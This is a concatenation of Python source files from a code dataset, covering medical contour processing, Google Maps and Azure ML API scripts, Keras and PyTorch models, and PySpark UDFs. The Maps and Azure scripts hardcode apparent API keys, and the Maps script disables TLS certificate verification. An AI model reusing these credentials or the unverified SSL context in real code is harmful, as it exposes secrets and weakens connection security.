self._getContourData(allPlanesDict)\n return contourDict\n\n def getPolygonDict(self):\n polyDict = {}\n for roi in self.structDict:\n contourDict = self.structDict[roi]\n polyDict[roi] = {}\n for zslice in contourDict:\n polyDict[roi][zslice] = Polygon(contourDict[zslice])\n return polyDict\n\n def createLabelNii( self, origNii, filename = 'label_test.nii' ):\n labelNii = nib.load(origNii)\n labelNii.header.set_data_dtype('uint32')\n labelImg = self.createLabelImg(labelNii)\n label = nib.Nifti1Image(labelImg, labelNii.affine, labelNii.header)\n nib.save(label, filename)\n\n def createLabelImg( self, origNii ):\n \n origShape = origNii.header.get_data_shape()\n labelImg = np.zeros(origShape, dtype = 'uint32')\n if len(self.structDict.keys()) > 32:\n raise ValueError('Label image can only represent 32 structures')\n \n # loop over structures - have to start from 1\n for n, roi in enumerate(sorted(self.structDict.keys())):\n n += 1\n binImg = np.zeros(origShape, dtype = np.bool)\n\n # loop over contours and sort from lowest z to highest\n for zslice in sorted(self.structDict[roi]):\n\n # convert x,y,z to voxel coordinates\n affine = np.linalg.inv(origNii.affine)\n contour = self.structDict[roi][zslice]\n # go from (x,y,z) array to (x,y,z,1)\n contour = np.c_[contour, np.ones(contour.shape[0])] \n # if not np.matmul use\n # np.core.umath_tests.matrix_multiply\n # this is only available in a newwer version of numpy\n ijk1 = np.matmul(affine, contour[...,np.newaxis]).reshape(contour.shape)\n ijk = ijk1[:,0:3]\n k = ijk[:,2]\n # check that they're all the same k value\n if not all(ktest == k[0] for ktest in k):\n print('Contour is not defined on one plane')\n\n #here is where we need to do python poly2mask\n contourMask = poly2mask(ijk[:,0], ijk[:,1],(origShape[0],origShape[1]))\n binImg[:,:,int(round(k[0]))] = contourMask\n\n #func = lambda x: set_bit(x, n, 1) #set the bits accoring to the ROI number]\n bitset = lambda x: x | (1 << n)\n labelImg[np.where(binImg)] = bitset(labelImg[np.where(binImg)])\n \n # to retrieve the individual structures again use:\n # a & (1< 1')\n for contourDict in contourList:\n data = np.array(contourDict[ \"contourData\" ], \\\n dtype = np.float)\n # need to reverse x and y for DICOM->Nifti\n data[:,0:2] = -data[:,0:2]\n planeDict[zslice] = data \n return planeDict\n\nclass _DeformContours(Contours):\n # don't use this code\n # this is just here if I ever want to use\n # snippets of this to deform landmarks/contours\n # according to an interpolated deformation \n # field\n def __init__(self):\n super(DeformContours, self).__init__()\n self.contourDict = self.getStructDict()\n\n def _deformContours( polyDictList ):\n dxy = 0.1\n wk0poly = polyDictList[0]\n testSlice = wk0poly[wk0poly.keys()[0]][0]\n pointList = list(testSlice.exterior.coords)\n xLast, yLast, zLast = pointList[ 0 ]\n xTuple = [ xLast ]\n yTuple = [ yLast ]\n zTuple = [ zLast ]\n for i in range( 1, len( pointList ) ):\n x, y, z = pointList[ i ]\n if ( abs( x - xLast ) > dxy ) or ( abs( y - yLast ) > dxy ):\n xTuple.append( pointList[ i ][ 0 ] )\n yTuple.append( pointList[ i ][ 1 ] )\n zTuple.append( pointList[ i ][ 2 ] )\n xLast, yLast, zLast = pointList[ i ]\n\n xArray = -np.array( xTuple )\n yArray = -np.array( yTuple )\n zArray = np.array( zTuple )\n xi = np.array([xArray, yArray, zArray]).T\n \n points, dvf = loadDefField()\n xfunction = RegularGridInterpolator(points, dvf[::-1,:,:,0])\n yfunction = RegularGridInterpolator(points, dvf[::-1,:,:,1])\n zfunction = RegularGridInterpolator(points, dvf[::-1,:,:,2])\n xNew = xfunction(xi)\n yNew = yfunction(xi)\n zNew = zfunction(xi)\n newPointList = zip(-xNew, -yNew, zNew)\n polygon2 = shapely.geometry.Polygon( newPointList )\n\n def _deformContours2(self ):\n from vtk import vtkPoints, vtkPolyData, vtkPolyDataWriter\n # dictionary returned by getStructDict()\n # load the first structure for now\n struct = self.ontourDict[self.contourDict.keys()[0]]\n pointList = []\n for key in sorted(struct.keys()):\n pointList.append(struct[key])\n pointArray = np.vstack(pointList)\n xArray = pointArray[:,0]\n yArray = pointArray[:,1]\n zArray = pointArray[:,2]\n xi = np.array([xArray, yArray, zArray]).T\n points, dvf = loadDefField()\n xfunction = RegularGridInterpolator(points, dvf[::-1,:,:,0])\n yfunction = RegularGridInterpolator(points, dvf[::-1,:,:,1])\n zfunction = RegularGridInterpolator(points, dvf[::-1,:,:,2])\n xNew = xfunction(xi)\n yNew = yfunction(xi)\n zNew = zfunction(xi)\n newPointList = np.array(zip(xNew,yNew,zNew))\n from vtk.util import numpy_support as VN\n pd = vtkPolyData()\n pts = vtkPoints()\n pts.SetData(VN.numpy_to_vtk(newPointList, deep=True))\n pd.SetPoints(pts)\n pdw = vtkPolyDataWriter()\n pdw.SetInputData(pd)\n pdw.SetFileName(\"parotid_deformed.vtk\")\n pdw.Write()\n \n\nclass ContoursFromLabelNii(object):\n def __init__(self, labelNii, roiList):\n super(ContoursFromLabelNii, self).__init__()\n self.labelNii = nib.load(labelNii)\n self.roiList = roiList\n self.polyDict = {}\n\n def getContours(self, filterVal ):\n print(\"get contours\")\n labelImg = self.labelNii.get_data()\n polyDict = {}\n for n, roi in enumerate(self.roiList):\n # eventually use for n in self.nList:\n ##### BITGET ######\n # should return a binary image with 1's in \n # the voxels where the ROI is\n n += 1\n print(n)\n print(\"n : {} \\t roi: {}\".format(n, roi))\n roiImg = (labelImg & (1<> n\n\n # remove z slices where the structure of interest does not exist\n roiCrop = roiImg[:,:,~(roiImg==0).all(axis=(0,1))]\n zcrop = ~(roiImg==0).all(axis=(0,1))\n #imgCrop = origImg[:,:,~(roiImg==0).all(axis=(0,1))]\n contourDict = {}\n for k, kslice in enumerate(np.rollaxis(roiImg,2)):\n if zcrop[k]:\n filteredRoi = gaussian(kslice, sigma=1, preserve_range =True)\n contours = find_contours(filteredRoi, filterVal, \\\n fully_connected='high', positive_orientation='high')\n polyDict[roi] = self.getContourDict(contours, k, self.labelNii.affine, \\\n contourDict)\n return polyDict \n\n def getVdim(self):\n return self.labelNii.header.get_zooms()\n \n def getBinaryImages(self):\n labelImg = self.labelNii.get_data()\n imageDict = {}\n for n, roi in enumerate(self.roiList):\n n += 1\n roiImg = (labelImg & (1<> n\n imageDict[roi] = roiImg\n\n return imageDict\n \n def getContourDict(self, contours, k, affine, contourDict, \\\n getPolygons = True):\n for contour in contours:\n contourXyz = self.getContourXyz(contour, k, affine)\n z = contourXyz[0,2]\n if np.abs(z - round(z)) < 1e-3:\n z = round(z)\n contourXyz[:,2] = z\n polygon = Polygon(contourXyz) \n if not contourDict.has_key(z):\n if getPolygons:\n contourDict[z] = [polygon]\n else:\n contourDict[z] = [contourXyz]\n else:\n if getPolygons:\n contourDict[z].append(polygon)\n else:\n contourDict[z].append(contourXyz)\n return contourDict\n\n def getContourXyz(self, ctr, k, affine):\n ctr = np.c_[ctr, np.ones(ctr.shape[0])*k, np.ones(ctr.shape[0])]\n ctr_xyz1 = np.matmul(affine, ctr[...,np.newaxis]).\\\n reshape(ctr.shape)\n return ctr_xyz1[:,0:3]\n\nclass ConformityChecker(object):\n\n def __init__( self, polygon1 = None, polygon2 = None, stepSize = 1. ):\n self.polygon1 = polygon1\n self.polygon2 = polygon2\n self.stepSize = stepSize\n self.union = polygon1.union( polygon2 )\n self.intersection = polygon1.intersection( polygon2 )\n if self.union.area:\n self.conformityIndex = self.intersection.area / self.union.area\n else:\n self.conformityIndex = 0.\n self.dice = 2 * self.intersection.area / ( polygon1.area + polygon2.area )\n self.hausdorff = polygon1.hausdorff_distance(polygon2)\n #self.analyseDistancesToConformity()\n\n #self.centroid1 = numpy.array(polygon1.centroid.coords).flatten()\n #self.centroid2 = numpy.array(polygon2.centroid.coords).flatten()\n\n #self.analyseDistanceBetweenCentres()\n #self.analyseLeftRightAntPostDifferences()\n\n def analyseDistancesToConformity( self ):\n x1, y1, x2, y2 = [ float( int( xy ) ) for xy in self.union.bounds ]\n\n distanceList1 = []\n distanceList2 = []\n nPixel = 0\n for x in frange( x1, x2 + 1., self.stepSize ):\n for y in frange( y1, y2 + 1., self.stepSize ):\n testPoint = Point( x, y )\n if testPoint.within( self.union ):\n nPixel = nPixel + 1\n if not testPoint.within( self.polygon1 ):\n #polygon 1 is the reference polygon - polygon 2 is the evaluation\n distanceList1.append( testPoint.distance( self.polygon1 ) )\n elif not testPoint.within( self.polygon2 ):\n distanceList2.append( -testPoint.distance( self.polygon2 ) )\n\n self.distanceList = distanceList1 + distanceList2\n self.meanDistanceToConformity = 0.\n self.meanOutsidePolygon1 = 0.\n self.meanOutsidePolygon2 = 0.\n self.distanceWeight = 0.\n\n if distanceList1:\n self.meanOutsidePolygon1= sum( distanceList1 ) / len( distanceList1 )\n\n if distanceList2:\n self.meanOutsidePolygon2 = -sum( distanceList2 ) / len( distanceList2 )\n\n if self.distanceList:\n self.meanDistanceToConformity = \\\n ( sum( distanceList1 ) - sum( distanceList2 ) ) \\\n / ( len( distanceList1 ) + len( distanceList2 ) )\n\n if nPixel:\n self.distanceWeight = 1. / float( nPixel )\n\n return None\n\n def analyseDistanceBetweenCentres( self ):\n #define the reference polygon centroid as the origin \n #and produce a vector with magntiude and direction\n self.centroidShiftVector = 0.\n self.distanceBetweenCentres = 0.\n self.unitCentroidShiftVector = 0.\n\n self.centroidShiftVector = self.centroid2 - self.centroid1\n self.distanceBetweenCentres = numpy.linalg.norm(self.centroidShiftVector)\n self.unitCentroidShiftVector = self.centroidShiftVector / self.distanceBetweenCentres\n\n return None\n\n def analyseLeftRightAntPostDifferences( self ):\n self.LRchange = 0.\n self.APchange = 0.\n x1min, y1min, x1max, y1max = [ float( xy ) for xy in self.polygon1.bounds ]\n x2min, y2min, x2max, y2max = [ float( xy ) for xy in self.polygon2.bounds ]\n\n x1range = abs(x1max - x1min)\n x2range = abs(x2max - x2min)\n self.LRchange = x2range - x1range\n\n y1range = abs(y1max - y1min)\n y2range = abs(y2max - y2min)\n self.APchange = y2range - y1range\n return None\n\ndef poly2mask(vertex_row_coords, vertex_col_coords, shape):\n fill_row_coords, fill_col_coords = draw.polygon(vertex_row_coords, vertex_col_coords, shape)\n mask = np.zeros(shape, dtype=np.bool)\n mask[fill_row_coords, fill_col_coords] = True\n return mask\n\ndef surfd(input1, input2, sampling=1, connectivity=1):\n from scipy.ndimage import morphology\n # surface_distance = surfd()\n # msd = surface_distance.mean()\n # rms = np.sqrt((surface_distance**2).mean())\n # hd = surface_distance.max()\n # from https://mlnotebook.github.io/post/surface-distance-function/\n input_1 = np.atleast_1d(input1.astype(np.bool))\n input_2 = np.atleast_1d(input2.astype(np.bool))\n\n conn = morphology.generate_binary_structure(input_1.ndim, connectivity)\n\n S = np.bitwise_xor(input_1,morphology.binary_erosion(input_1, conn))\n Sprime = np.bitwise_xor(input_2, morphology.binary_erosion(input_2, conn))\n\n dta = morphology.distance_transform_edt(~S,sampling)\n dtb = morphology.distance_transform_edt(~Sprime,sampling)\n \n sds = np.concatenate([np.ravel(dta[Sprime!=0]), np.ravel(dtb[S!=0])])\n \n return sds\n\ndef getDice(input1, input2):\n input_1 = np.atleast_1d(input1.astype(np.int))\n input_2 = np.atleast_1d(input2.astype(np.int))\n union = input_1 + input_2 \n # not actually union : DSC is defined as \n # intersection\n union[np.where(union==1)] = 0\n union[np.where(union==2)] = 1\n dice = 2 * np.sum(union).astype(np.float) / (np.sum(input_1) + np.sum(input_2))\n return dice","sub_path":"registration/optimisation/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":14131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"625206853","text":"\nimport json, urllib.request\nimport ssl\n\nzip1 = 42119\nstreet_adress = \"am+freudenberg+75\"\n\nkey_geo = \"AIzaSyDC1RZ-cUJdGrJmLmaDfi7KWPBmiaZTyF4\"\n\nif street_adress != \"\":\n geo_address = street_adress + '-' + str(zip1)\n\n print(geo_address)\n\n\n\n context = ssl._create_unverified_context()\n geo_api = \"https://maps.googleapis.com/maps/api/geocode/json?address=\" + geo_address + \"&key=\" + key_geo\n with urllib.request.urlopen(geo_api, context=context) as url:\n geo_data = json.loads(url.read().decode())\n geo_lat = geo_data[\"results\"][0][\"geometry\"][\"location\"][\"lat\"]\n geo_lng = geo_data[\"results\"][0][\"geometry\"][\"location\"][\"lng\"]\n print(geo_lat)\n print(geo_lng)\n\n nearby_api = \"https://maps.googleapis.com/maps/api/place/nearbysearch/json?location=\" + str(geo_lat) +\"%2C\" + str(geo_lng) +\"&rankby=distance&type=train_station&key=\" + key_geo\n print(nearby_api)\n with urllib.request.urlopen(nearby_api, context=context) as url:\n nearby_data_raw = json.loads(url.read().decode())\n print(nearby_data_raw)\n\n nearby_station_name = nearby_data_raw[\"results\"][0][\"name\"]\n nearby_station_lat = nearby_data_raw[\"results\"][0][\"geometry\"][\"location\"][\"lat\"]\n nearby_station_lng = nearby_data_raw[\"results\"][0][\"geometry\"][\"location\"][\"lng\"]\n\n\n print(nearby_station_name)\n\n distance_api = \"https://maps.googleapis.com/maps/api/directions/json?origin=\" + str(geo_lat) + \"%2c\" + str(geo_lng) + \"&destination=\" + str(nearby_station_lat) + \"%2c\" + str(nearby_station_lng) + \"&mode=walk&key=\" + key_geo\n with urllib.request.urlopen(distance_api, context=context) as url:\n distance_raw = json.loads(url.read().decode())\n nearby_station_distance = distance_raw[\"routes\"][0][\"legs\"][0][\"distance\"][\"text\"]\n nearby_station_duration = distance_raw[\"routes\"][0][\"legs\"][0][\"duration\"][\"text\"]\n \n distance_api = \"https://maps.googleapis.com/maps/api/directions/json?origin=\" + str(geo_lat) + \"%2c\" + str(geo_lng) + \"&destination=\" + \"50.9427839\" + \"%2c\" + \"6.9590705\" + \"&mode=walk&key=\" + key_geo\n with urllib.request.urlopen(distance_api, context=context) as url:\n distance_raw2 = json.loads(url.read().decode())\n cologne_distance = distance_raw2[\"routes\"][0][\"legs\"][0][\"distance\"][\"text\"]\n cologne_duration = distance_raw2[\"routes\"][0][\"legs\"][0][\"duration\"][\"text\"] \n\n distance_api = \"https://maps.googleapis.com/maps/api/directions/json?origin=\" + str(geo_lat) + \"%2c\" + str(geo_lng) + \"&destination=\" + \"51.22019577026367\" + \"%2c\" + \"6.792957305908203\" + \"&mode=walk&key=\" + key_geo\n with urllib.request.urlopen(distance_api, context=context) as url:\n distance_raw2 = json.loads(url.read().decode()) \n dusseldorf_distance = distance_raw2[\"routes\"][0][\"legs\"][0][\"distance\"][\"text\"]\n dusseldorf_duration = distance_raw2[\"routes\"][0][\"legs\"][0][\"duration\"][\"text\"]","sub_path":"bus-distancetest.py","file_name":"bus-distancetest.py","file_ext":"py","file_size_in_byte":3543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"316758223","text":"import sys\nimport csv\nimport numpy\nimport pandas\nfrom collections import OrderedDict\n\nimport keras\nfrom keras.models import Sequential, load_model\nfrom keras.layers import Dense, Dropout, Activation\nfrom keras.layers import TimeDistributed\nfrom keras.layers import LSTM\nfrom keras.preprocessing import sequence\nfrom keras.optimizers import SGD\n# fix random seed for reproducibility\n# numpy.random.seed(7)\n\nfeatures = 108\n# readin\n# train.ark (1124823, 70+39) test.ark (180406, 70)\nX_temp = pandas.read_csv(sys.argv[1]+'fbank/train.ark', sep=' ', header=None).values\nX_temp2 = pandas.read_csv(sys.argv[1]+'mfcc/train.ark', sep=' ', header=None).values\nX_temp = numpy.append( X_temp, X_temp2[:, 1:], axis=1)\n# train.lab (1124823, 2)\ny_temp = pandas.read_csv(sys.argv[1]+'label/train.lab', sep=',', header=None).values\nmap48phone_char = pandas.read_csv(sys.argv[1]+'48phone_char.map', sep='\\t', header=None).values\nd48tonum = OrderedDict( zip(map48phone_char[:,0], map48phone_char[:,1]) )\n\n# aligning\nd1 = OrderedDict( zip(X_temp[:,0], numpy.zeros(X_temp.shape[0])) )\nd2 = OrderedDict( zip(y_temp[:,0], y_temp[:,1]) )\nd1.update(d2)\ny_temp = numpy.array( list( d1.values() ) )\n\n# mapping\nfor i in range(y_temp.shape[0]):\n y_temp[i] = d48tonum.get(str(y_temp[i]))\ny_temp = y_temp.astype(numpy.int16)\n\n# reshape\nwav_count = 1\nfor i in range(X_temp.shape[0]):\n X_temp[i, 0] = int(str(X_temp[i, 0]).split('_')[2])\nfor i in range(X_temp.shape[0]-1):\n if X_temp[i, 0] > X_temp[i+1, 0] :\n wav_count = wav_count + 1\nmax_time = int(numpy.amax(X_temp[:,0]))\n\n\nX = numpy.zeros((wav_count, max_time, features), numpy.float)\ny = numpy.zeros((wav_count, max_time, 1 ), numpy.int16)\n\ncount = 0\nfor i in range(X_temp.shape[0]-1):\n if X_temp[i, 0] > X_temp[i+1, 0] or i == (X_temp.shape[0]-2) :\n flame = X_temp[i, 0]\n X_resh = numpy.reshape(X_temp[( i+1- flame) : (i+1), 1: ], (1, flame, features))\n y_resh = numpy.reshape(y_temp[( i+1- flame) : (i+1) ] , (1, flame, 1))\n zerofeatures = numpy.zeros((1, max_time-flame, features), numpy.float)\n zero1 = numpy.ones((1, max_time-flame, 1 ), numpy.int16) * 37\n # numpy.repeat( numpy.reshape( y_resh[0, flame-1,:], (1, 1, 1)), max_time-flame, axis=1)\n X[count] = numpy.append( X_resh , zerofeatures, axis=1)\n y[count] = numpy.append( y_resh , zero1 , axis=1)\n count = count + 1\n\n\nX_train = numpy.copy(X)\ny_train = keras.utils.to_categorical( y , 48 )\ny_train = numpy.reshape(y_train, (X_train.shape[0], X_train.shape[1], 48))\n\n# for debugging\nprint('X(samples, timesteps, input_dim):', X_train.shape)\nprint('--------------------------------')\nprint('y(samples, timesteps, output_dim):', y_train.shape)\nprint('--------------------------------')\n# Start training\nmodel = Sequential()\n# model.add(Embedding(features, output_dim=256))\nmodel.add(LSTM(1024,\n # input_length=TIME_STEPS, input_dim=INPUT_SIZE\n input_shape=(X_train.shape[1], X_train.shape[2]), \n batch_size=16,\n return_sequences=True,\n stateful=True))\nmodel.add(Dropout(0.2))\nmodel.add(LSTM(1024, return_sequences=True))\nmodel.add(Dropout(0.2))\nmodel.add(TimeDistributed(Dense(48, activation='softmax')))\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n# model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy'])\nprint(model.summary())\nmodel.fit(X_train, y_train, epochs=2, batch_size=16)\nmodel.save(sys.argv[2])","sub_path":"hw1/model_rnn.py","file_name":"model_rnn.py","file_ext":"py","file_size_in_byte":3524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"304355991","text":"from .ContrastiveLoss import *\r\nimport torch\r\nimport torch.nn as nn\r\n\r\nclass TwoStreamPretrain(nn.Module):\r\n '''\r\n Pretraining on COCO dataset with cross-modal contrastive learning\r\n '''\r\n def __init__(self, image_model, language_model, embedding_dim=768, sigma=0.1):\r\n super(TwoStreamPretrain, self).__init__()\r\n self.image_model = image_model\r\n self.language_model = language_model\r\n self.image_projection_head = nn.Sequential(\r\n nn.Conv2d(embedding_dim, embedding_dim, kernel_size=1, stride=1, padding=0),\r\n )\r\n self.language_projection_head = nn.Sequential(\r\n nn.Linear(embedding_dim,embedding_dim),\r\n )\r\n self.sigma = sigma\r\n\r\n def forward(self, image_input, language_input, token_type, input_mask, nwords): # add two input terms: relation mask and relation class\r\n image_output = self.image_model(image_input)\r\n image_metric = self.image_projection_head(image_output)\r\n language_output = self.language_model(language_input, token_type, input_mask) # batch x n_object x emb_size\r\n language_metric = self.language_projection_head(language_output)\r\n # loss function\r\n loss_I2L, loss_L2I = cross_modal_contrastive_loss(image_metric, language_metric, nwords, sigma=self.sigma)\r\n\r\n return loss_I2L, loss_L2I\r\n\r\nclass RelationalGrounding(nn.Module):\r\n '''\r\n Finetuning on Visual Genome dataset for relation relation prediction\r\n '''\r\n def __init__(self, image_model, language_model, cross_attention_model, embedding_dim=768, relation_size=115, temperature=1.0):\r\n super(RelationalGrounding, self).__init__()\r\n self.image_model = image_model\r\n self.language_model = language_model\r\n self.cross_attention_model = cross_attention_model\r\n self.relation_size = relation_size\r\n self.temperature = temperature\r\n self.object_classifier = nn.Sequential(\r\n nn.Linear(768, 256),\r\n nn.ReLU(True),\r\n nn.Dropout(0.1),\r\n nn.Linear(256, 56),\r\n )\r\n\r\n def forward(self, image_input, object_input_all, segments_tensors_all, input_token_mask_all, input_mask, n_object, object_target, relation_target): # add two input terms: relation mask and relation class\r\n language_output = self.language_model(object_input_all, segments_tensors_all, input_token_mask_all, input_mask) # batch x n_object x emb_size\r\n image_output = self.image_model(image_input)\r\n (query_language, key_visual, object_representation, relation_prediction, normalized_relational_matrix) = self.cross_attention_model(image_output, language_output, attention_mask=input_mask)\r\n object_prediction = self.object_classifier(object_representation)\r\n object_prediction = object_prediction.permute(0, 2, 1)\r\n # loss functions:\r\n loss_cls_object = torch.nn.CrossEntropyLoss(reduction='none')(object_prediction, object_target) # auxilary loss for classifying visually grounded objects\r\n loss_pair, loss_relation = relation_contrastive_loss(relation_prediction, relation_target, temperature=self.temperature) # contrastive loss between relation and object pairs\r\n\r\n return loss_cls_object, loss_pair, loss_relation, relation_target, relation_prediction, object_target, object_prediction\r\n\r\nclass TransferCrossModalRetrieval(nn.Module):\r\n def __init__(self, image_model, language_model, cross_attention_model, embedding_dim=768, metric_dim=768, sigma=0.1):\r\n super(TrasferCrossModalRetrieval, self).__init__()\r\n self.image_model = image_model\r\n self.language_model = language_model\r\n self.cross_attention_model = cross_attention_model\r\n self.image_projection_head = nn.Sequential(\r\n nn.Conv2d(embedding_dim, embedding_dim, kernel_size=1, stride=1, padding=0),\r\n nn.ReLU(True),\r\n nn.Dropout(),\r\n nn.Conv2d(embedding_dim, metric_dim, kernel_size=1, stride=1, padding=0),\r\n )\r\n self.language_projection_head = nn.Sequential(\r\n nn.Linear(embedding_dim,embedding_dim),\r\n nn.ReLU(True),\r\n nn.Dropout(),\r\n nn.Linear(embedding_dim, metric_dim),\r\n )\r\n self.sigma = sigma\r\n\r\n def forward(self, image_input, language_input, token_type, input_mask, nwords): # add two input terms: relation mask and relation class\r\n language_output = self.language_model.language_model(language_input, token_type, input_mask)[0] #.last_hidden_state # batch x n_word x emb_size\r\n image_output = self.image_model(image_input)\r\n (query_language, key_visual, _, _, _, _, _) = self.cross_attention_model(image_output, language_output, attention_mask=input_mask)\r\n image_metric = self.image_projection_head(key_visual)\r\n language_metric = self.language_projection_head(query_language)\r\n # loss functions:\r\n image_pool_metric = torch.mean(image_metric,(2,3)) # pool image embedding to single vector\r\n language_pool_metric = torch.mean(language_metric,1) # pool language embedding to single vector\r\n loss_I2L, loss_L2I = finetune_pooled_contrastive_loss(image_pool_metric, language_pool_metric, sigma=self.sigma) #\r\n\r\n return image_metric, language_metric, loss_I2L, loss_L2I\r\n","sub_path":"models/FullModels.py","file_name":"FullModels.py","file_ext":"py","file_size_in_byte":5333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"222409284","text":"#import libraries\nfrom flask import Flask,render_template,url_for,request\nimport pickle\nfrom sklearn.externals import joblib\nimport urllib.request\nimport json\nimport datetime\n\n#function to classify user's click based on their demographic details\ndef click_classifier(daily_time_spent, age, income, daily_internet_usage, male, month, day_month, weekday):\n classify_model = open('./classify_cust_click1.pkl','rb')\n clk = joblib.load(classify_model)\n click_prediction = ''\n click_prediction = clk.predict([[daily_internet_usage, age, income, daily_internet_usage, male, month, day_month, weekday]])\n return click_prediction[0]\n\ndef azure_classifier(daily_time_spent, age, income, daily_internet_usage, male, date_clicked_ts):\n data = {\n \"Inputs\":{\n \"input1\":[\n {\n 'Daily Time Spent on Site': daily_time_spent, \n 'Age': age, \n 'Area Income': income, \n 'Daily Internet Usage': daily_internet_usage, \n 'Ad Topic Line': \"Cloned 5thgeneration orchestration\", \n 'City': \"Wrightburgh\", \n 'Male': male, \n 'Country': \"Tunisia\", \n 'Timestamp': date_clicked_ts, \n 'Clicked on Ad': \"0\", \n }\n ],\n },\n \"GlobalParameters\":{\n\n }\n }\n\n def myconverter(o):\n if isinstance(o, datetime.datetime):\n return o.__str__()\n\n body = str.encode(json.dumps(data, default = myconverter))\n url = 'https://ussouthcentral.services.azureml.net/workspaces/ef38c30a218d4b6596c184f8980f563f/services/b306c2c378f64c0b83be8c8de8bf064b/execute?api-version=2.0&format=swagger'\n api_key = 'kF0DpKj2wPUB6ytds1+59ejPqrq8qWQyajN/0MhqrYUx5sSm+toveiz6SzfEI91Ax/K4QxLm++NdEbCjQ+Ga9w==' # Replace this with the API key for the web service\n headers = {'Content-Type':'application/json', 'Authorization':('Bearer '+ api_key)}\n \n req = urllib.request.Request(url, body, headers)\n response = urllib.request.urlopen(req)\n result = response.read().decode('utf-8')\n print (result)\n d = json.loads(result)\n print (d['Results']['output1'][0]['Scored Labels'])\n return d['Results']['output1'][0]['Scored Labels']","sub_path":"user click prediction ad/click prediction demographic flask/clickclassifier.py","file_name":"clickclassifier.py","file_ext":"py","file_size_in_byte":2317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"191453102","text":"##List of Functions (Update as more added in)\n#startTimes\n#failTimes\n#removeDuplicates\n#getClosestandStartTimes\n#timeOnOff\n#shutTimes\n\n\n\nimport pandas as pd\nfrom pyspark.sql.types import *\nfrom pyspark.sql.functions import pandas_udf,PandasUDFType\n\nschemaST = StructType([\n StructField(\"CSN\", StringType()),\n StructField(\"EventID\", LongType()),\n StructField(\"DateTime\", StringType())\n])\n\n \n\n@pandas_udf(schemaST, functionType=PandasUDFType.GROUPED_MAP)\ndef startTimes(df):\n gr = df['CSN'].iloc[0]#used for the default returned dataframe if no data being returned\n EventID = 65533\n events = df[df['EventID']==EventID].sort_values(['DateTime']) #start events\n DateTime = pd.to_numeric(pd.to_datetime(events['DateTime']))/1e9 #convert ns to s\n DateTimeNext = DateTime.shift(periods=-1) # -1 because we want to find the gap until the NEXT one (ie. if THIS event failed)\n time_diff = (DateTimeNext-DateTime) #Find the difference in event times\n df_less15m = events[((time_diff>(30*60)) | (time_diff.isnull()))]#more than 30 min or when time_diff is null, as that is the last recorded event\n default_df = pd.DataFrame([[gr,EventID,'None']]) #Returned if no start events detected - filter out using Datetime == none\n if len(df_less15m.index)>0:\n return_df = pd.DataFrame(df_less15m[['CSN','EventID','DateTime']])\n #reset column names, this needs to be done otherwise it won't match the schema above. It works when we do .mean() etc\n #because that doesn't give a named column when we create the dataframe, whereas this does.\n return_df = return_df.T.reset_index(drop=True).T #this feels hacky\n return return_df\n else:\n return default_df\n\n\n\n\n\n\n##FAIL TIMES UDF\n\nschemaFT = StructType([\n StructField(\"CSN\", StringType()),\n StructField(\"EventID\", IntegerType()),\n StructField(\"DateTime\", StringType())\n])\n\n@pandas_udf(schemaFT, functionType=PandasUDFType.GROUPED_MAP)\ndef failTimes(df):\n gr = df['CSN'].iloc[0]#used for the default returned dataframe if no data being returned\n EventID = 65533\n events = df[df['EventID']==EventID].sort_values(['DateTime'])\n DateTime = pd.to_numeric(pd.to_datetime(events['DateTime']))/1e9 #convert ns to s\n DateTimeNext = DateTime.shift(periods=-1) # -1 because we want to find the gap until the NEXT one (ie. if THIS event failed)\n time_diff = (DateTimeNext-DateTime)\n df_less15m = events[((time_diff<(30*60)) & (time_diff > 10))]#more than 10s, less than 30 mins\n default_df = pd.DataFrame([[gr,EventID,'None']])\n if len(df_less15m.index)>0:\n return_df = pd.DataFrame(df_less15m[['CSN','EventID','DateTime']])\n #reset column names, this needs to be done otherwise it won't match the schema above. It works when we do .mean() etc\n #because that doesn't give a named column when we create the dataframe, whereas this does.\n return_df = return_df.T.reset_index(drop=True).T #this feels hacky\n return return_df\n else:\n return default_df\n\n\n\n\n\n##REMVOE DUPLICATES UDF\n\nschemaRD = StructType([\n StructField(\"CSN\", StringType()),\n StructField(\"EventID\", IntegerType()),\n StructField(\"EventIDNext\", IntegerType()),\n StructField(\"DateTime\", StringType()),\n StructField(\"DateTimeInt\", IntegerType()),\n StructField(\"DateTimeIntNext\", IntegerType()),\n StructField(\"timeDiff\", IntegerType())\n])\n\n@pandas_udf(schemaRD, functionType=PandasUDFType.GROUPED_MAP)\ndef removeDuplicates(df):\n df.rename(columns=lambda x: x.lstrip(), inplace = True)\n \n gr = df['CSN'].iloc[0]#used for the default returned dataframe if no data being returned\n EventID = 65533\n df['DateTimeInt'] = pd.to_numeric(pd.to_datetime(df['DateTime']))/1e9 #convert ns to s\n df = df.sort_values(['EventID','DateTimeInt'])\n\n df['DateTimeIntNext'] = df['DateTimeInt'].shift(periods=-1) # -1 because we want to find the gap until the NEXT one (ie. if THIS event failed)\n df['EventIDNext'] = df['EventID'].shift(periods=-1)\n \n df['timeDiff'] = (df['DateTimeIntNext']-df['DateTimeInt'])\n \n #Remove the rows with timeDiff between -1 and 1 and the same event ID\n dResult = df[((df.timeDiff < -1) | (df.timeDiff > 1)) | (df.EventID != df.EventIDNext)]\n \n #If empty array: i.e. only one event type happens, all at the same time, return the first row\n if dResult.empty:\n dResult = df.iloc[[0]]\n return dResult\n\n\n\n\nschemaGCST = StructType([\nStructField(\"CSN\", StringType()),\nStructField(\"EventID\", IntegerType()),\nStructField(\"DateTime\", StringType()), \nStructField(\"TimeToStart\", IntegerType()),\nStructField(\"DateTimeInt\", IntegerType()),\nStructField(\"startIndex\", IntegerType())\n])\n\n@pandas_udf(schemaGCST, functionType=PandasUDFType.GROUPED_MAP)\ndef getClosestStartsandTimes(df):\n df.rename(columns=lambda x: x.lstrip(), inplace = True)\n gr = df['CSN'].iloc[0]#used for the default returned dataframe if no data being returned\n\n #Get time in seconds\n df['DateTimeInt'] = 